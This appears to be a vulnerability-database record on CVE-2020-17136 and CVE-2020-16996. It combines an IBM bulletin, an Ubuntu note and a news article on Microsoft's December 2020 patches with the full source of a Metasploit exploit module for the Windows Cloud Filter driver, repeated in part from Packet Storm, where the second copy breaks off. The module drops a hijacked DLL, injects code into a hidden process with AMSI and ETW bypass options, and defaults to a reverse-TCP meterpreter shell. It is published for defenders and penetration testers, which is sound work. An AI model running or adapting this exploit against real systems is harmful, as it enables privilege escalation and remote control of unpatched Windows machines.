"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T11:16:36", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17136"], "modified": "2021-03-31T14:42:21", "id": "DAF55AA9-F00A-533A-A843-3EC20DDE6BD0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "ubuntucve": [{"lastseen": "2022-08-04T13:24:01", "description": "Kerberos Security Feature Bypass Vulnerability\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this is a Microsoft-specific issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2020-16996", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2020-12-10T00:00:00", "id": "UB:CVE-2020-16996", "href": "https://ubuntu.com/security/CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "ibm": [{"lastseen": "2022-08-04T12:57:45", "description": "## Summary\n\nMultiple Vulnerabilities identified in MS Windows Server platforms. Information about vulnerabilities has been published in the provider security update guide. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nMain Product version (s)| Affected Supporting Product Version(s) \n---|--- \nIBM Cloud Pak System V2.3| Microsoft Windows Server 2012 Microsoft Windows Server 2016 Microsoft Windows Server 2019 \n \n\n\n## Remediation/Fixes\n\nInformation about vulnerabilities in MS Windows Server platforms has been published in the provider security updates. If you are running specific configurations, recommendation is to review your environment. Consult Security Update Guide to search for available patches corresponding to the platform in use in your environment, see [MS Security TechCenter - December 2020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16996> \"Kerberos Security Feature Bypass Vulnerability\" ). \n\n \n\n\n \n\n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[MS Security Update Guide](<https://msrc.microsoft.com/update-guide/>)\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n06 Apr 2021: Initial Publication \n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU004\",\"label\":\"Hybrid Cloud\"},\"Product\":{\"code\":\"SSFQWQ\",\"label\":\"IBM Cloud Pak System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.3\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:03:35", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Windows Server supporting products bundled with Cloud Pak Systems", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-04-06T23:03:35", "id": "F34133DBAC4F6FEF866DB845BED95244FB18E8AD56C9EDC4C9EFFFDFD49046C8", "href": "https://www.ibm.com/support/pages/node/6440675", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:38:42", "description": "[](<https://thehackernews.com/images/-wZcaIEHX7Zo/X9BZDmYe2-I/AAAAAAAABMU/Pg1oyzktpWMoZFhMfp5peSGqQMfOdZQqwCLcBGAsYHQ/s0/Update-Microsoft-Windows.jpg>)\n\nMicrosoft on Tuesday released fixes for 58 newly discovered security flaws spanning as many as 11 products and services as part of its final [Patch Tuesday of 2020](<https://msrc.microsoft.com/update-guide/releaseNote/2020-Dec>), effectively bringing their CVE total to 1,250 for the year.\n\nOf these 58 patches, nine are rated as Critical, 46 are rated as Important, and three are rated Moderate in severity.\n\nThe December security release addresses issues in Microsoft Windows, Edge browser, ChakraCore, Microsoft Office, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK, and Azure Sphere.\n\nFortunately, none of these flaws this month have been reported as publicly known or being actively exploited in the wild.\n\nThe fixes for December concern a number of remote code execution (RCE) flaws in Microsoft Exchange (CVE-2020-17132), SharePoint (CVE-2020-17118 and CVE-2020-17121), Excel (CVE-2020-17123), and Hyper-V virtualization software (CVE-2020-17095), as well as a patch for a security feature bypass in Kerberos (CVE-2020-16996), and a number of privilege escalation flaws in Windows Backup Engine and Windows Cloud Files Mini Filter Driver.\n\nCVE-2020-17095 also carries the highest CVSS score of 8.5 among all vulnerabilities addressed in this month's release.\n\n\"To exploit this vulnerability, an attacker could run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code when it fails to properly validate vSMB packet data,\" Microsoft [noted](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>).\n\nAdditionally included as part of this month's release is an [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/ADV200013>) for a [DNS cache poisoning](<https://blog.cloudflare.com/sad-dns-explained/>) vulnerability (CVE-2020-25705) discovered by security researchers from Tsinghua University and the University of California last month.\n\nDubbed a Side-channel AttackeD DNS attack (or [SAD DNS attack](<https://thehackernews.com/2020/11/sad-dns-new-flaws-re-enable-dns-cache.html>)), the flaw could enable an attacker to spoof the DNS packet, which can be cached by the DNS Forwarder or the DNS Resolver, thereby re-enabling DNS cache poisoning attacks.\n\nTo mitigate the risk, Microsoft recommends a Registry workaround that involves changing the maximum UDP packet size to 1,221 bytes (4C5 Hexadecimal).\n\n\"For responses larger than 4C5 or 1221, the DNS resolver would now switch to TCP,\" the Windows maker stated in its advisory.\n\nSince the attack relies on sending spoofed UDP (User Datagram Protocol) messages to defeat source port randomization for DNS requests, implementing the tweak will cause larger DNS queries to switch to TCP, thus mitigating the flaw.\n\nIt's highly advised that Windows users and system administrators apply the latest security patches to resolve the threats associated with these issues.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-09T04:57:00", "type": "thn", "title": "Microsoft Releases Windows Update (Dec 2020) to Fix 58 Security Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996", "CVE-2020-17095", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17123", "CVE-2020-17132", "CVE-2020-25705"], "modified": "2020-12-09T04:58:40", "id": "THN:BCD236457064C9D8673B1536BE370718", "href": "https://thehackernews.com/2020/12/microsoft-releases-windows-update-dec.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:41:27", "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T18:04:38", "type": "metasploit", "title": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2022-03-21T12:47:39", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_17136-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2020_17136/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n include Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Post::Windows::Dotnet\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::FileSystem\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',\n 'Description' => %q{\n The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'James Foreshaw', # Vulnerability discovery and PoC creator\n 'Grant Willcox' # Metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X64],\n 'Targets' => [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' => [\n ['CVE', '2020-17136'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']\n ],\n 'Notes' => {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'process',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_process_attach\n stdapi_sys_process_execute\n stdapi_sys_process_get_processes\n stdapi_sys_process_getpid\n stdapi_sys_process_kill\n stdapi_sys_process_memory_allocate\n stdapi_sys_process_memory_write\n stdapi_sys_process_thread_create\n ]\n }\n }\n )\n )\n register_options(\n [\n OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),\n OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),\n OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])\n ]\n )\n end\n\n def check_requirements(clr_req, installed_dotnet_versions)\n installed_dotnet_versions.each do |fi|\n if clr_req == 'v4.0.30319'\n if fi[0] == '4'\n vprint_status('Requirements ok')\n return true\n end\n elsif fi[0] == '3'\n vprint_status('Requirements ok')\n return true\n end\n end\n print_error('Required dotnet version not present')\n false\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n vprint_status(\"Target's build number: #{build_num}\")\n end\n\n build_num_gemversion = Rex::Version.new(build_num)\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.685')) # Windows 10 20H2\n return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1\n return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909\n return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903\n return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')\n elsif session.arch != ARCH_X64\n fail_with(Failure::NoTarget, 'Sorry, WOW64 is not supported at this time!')\n end\n dir_junct_path = 'C:\\\\Windows\\\\Temp'\n intermediate_dir = rand_text_alpha(10).to_s\n junction_dir = rand_text_alpha(10).to_s\n path_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\"\n\n mkdir(path_to_intermediate_dir.to_s)\n if !directory?(path_to_intermediate_dir.to_s)\n fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')\n end\n register_dir_for_cleanup(path_to_intermediate_dir.to_s)\n\n mkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')\n end\n\n mount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\')\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')\n end\n\n exe_path = ::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))\n unless File.file?(exe_path)\n fail_with(Failure::BadConfig, 'Assembly not found')\n end\n installed_dotnet_versions = get_dotnet_versions\n vprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\")\n if installed_dotnet_versions == []\n fail_with(Failure::BadConfig, 'Target has no .NET framework installed')\n end\n if check_requirements('v4.0.30319', installed_dotnet_versions) == false\n fail_with(Failure::BadConfig, 'CLR required for assembly not installed')\n end\n payload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\"\n print_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\")\n write_file(payload_path, generate_payload_dll)\n register_file_for_cleanup(payload_path)\n execute_assembly(exe_path, \"#{path_to_intermediate_dir} #{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\")\n service_start('smphost')\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll')\n sleep(3)\n delete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle)\n end\n\n def pid_exists(pid)\n mypid = client.sys.process.getpid.to_i\n\n if pid == mypid\n print_bad('Cannot select the current process as the injection target')\n return false\n end\n\n host_processes = client.sys.process.get_processes\n if host_processes.empty?\n print_bad('No running processes found on the target host.')\n return false\n end\n\n theprocess = host_processes.find { |x| x['pid'] == pid }\n\n !theprocess.nil?\n end\n\n def launch_process\n process_name = 'notepad.exe'\n print_status(\"Launching #{process_name} to host CLR...\")\n\n process = client.sys.process.execute(process_name, nil, {\n 'Channelized' => true,\n 'Hidden' => true,\n 'UseThreadToken' => true,\n 'ParentPid' => 0\n })\n hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{hprocess.pid} launched.\")\n [process, hprocess]\n end\n\n def inject_hostclr_dll(process)\n print_status(\"Reflectively injecting the Host DLL into #{process.pid}..\")\n\n library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting Host into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n [exploit_mem, offset]\n end\n\n def execute_assembly(exe_path, exe_args)\n if sysinfo.nil?\n fail_with(Failure::BadConfig, 'Session invalid')\n else\n print_status(\"Running module against #{sysinfo['Computer']}\")\n end\n if datastore['WAIT'].zero?\n print_warning('Output unavailable as wait time is 0')\n end\n\n process, hprocess = launch_process\n exploit_mem, offset = inject_hostclr_dll(hprocess)\n\n assembly_mem = copy_assembly(exe_path, hprocess, exe_args)\n\n print_status('Executing...')\n hprocess.thread.create(exploit_mem + offset, assembly_mem)\n\n if datastore['WAIT'].positive?\n sleep(datastore['WAIT'])\n read_output(process)\n end\n\n if datastore['KILL']\n print_good(\"Killing process #{hprocess.pid}\")\n client.sys.process.kill(hprocess.pid)\n end\n\n print_good('Execution finished.')\n end\n\n def copy_assembly(exe_path, process, exe_args)\n print_status(\"Host injected. Copy assembly into #{process.pid}...\")\n int_param_size = 8\n sign_flag_size = 1\n amsi_flag_size = 1\n etw_flag_size = 1\n assembly_size = File.size(exe_path)\n\n cln_params = ''\n cln_params << exe_args\n cln_params << \"\\x00\"\n\n payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size\n payload_size += assembly_size + cln_params.length\n assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)\n params = [\n assembly_size,\n cln_params.length,\n datastore['AMSIBYPASS'] ? 1 : 0,\n datastore['ETWBYPASS'] ? 1 : 0,\n 2\n ].pack('IICCC')\n params += cln_params\n\n process.memory.write(assembly_mem, params + File.read(exe_path, mode: 'rb'))\n print_status('Assembly copied.')\n assembly_mem\n end\n\n def read_output(process)\n print_status('Start reading output')\n old_timeout = client.response_timeout\n client.response_timeout = 5\n\n begin\n loop do\n output = process.channel.read\n if !output.nil? && !output.empty?\n output.split(\"\\n\").each { |x| print_good(x) }\n end\n break if output.nil? || output.empty?\n end\n rescue Rex::TimeoutError\n vprint_warning('Time out exception: wait limit exceeded (5 sec)')\n rescue ::StandardError => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n client.response_timeout = old_timeout\n print_status('End output.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2020_17136.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-01-12T16:47:37", "description": "", "cvss3": {}, "published": "2021-01-12T00:00:00", "type": "packetstorm", "title": "Cloud Filter Arbitrary File Creation / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2021-01-12T00:00:00", "id": "PACKETSTORM:160919", "href": "https://packetstormsecurity.com/files/160919/Cloud-Filter-Arbitrary-File-Creation-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \ninclude Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Post::Windows::Dotnet \ninclude Msf::Post::Windows::Services \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP', \n'Description' => %q{ \nThe Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December \n2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when \ncalling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() \nfunction with attacker controlled input. This meant that files were created with \nKernelMode permissions, thereby bypassing any security checks that would otherwise \nprevent a normal user from being able to create files in directories \nthey don't have permissions to create files in. \n \nThis module abuses this vulnerability to perform a DLL hijacking attack against the \nMicrosoft Storage Spaces SMP service, which grants the attacker code execution as the \nNETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one \nof the Meterpreter payloads, as doing so will allow them to subsequently escalate their \nnew session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command \nto perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'James Foreshaw', # Vulnerability discovery and PoC creator \n'Grant Willcox' # Metasploit module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => [ \n['CVE', '2020-17136'], \n['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136'] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n} \n) \n) \nregister_options( \n[ \nOptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]), \nOptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]), \nOptInt.new('WAIT', [false, 'Time in seconds to wait', 5]) \n], self.class \n) \n \nregister_advanced_options( \n[ \nOptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false]) \n] \n) \nend \n \ndef check_requirements(clr_req, installed_dotnet_versions) \ninstalled_dotnet_versions.each do |fi| \nif clr_req == 'v4.0.30319' \nif fi[0] == '4' \nvprint_status('Requirements ok') \nreturn true \nend \nelsif fi[0] == '3' \nvprint_status('Requirements ok') \nreturn true \nend \nend \nprint_error('Required dotnet version not present') \nfalse \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] 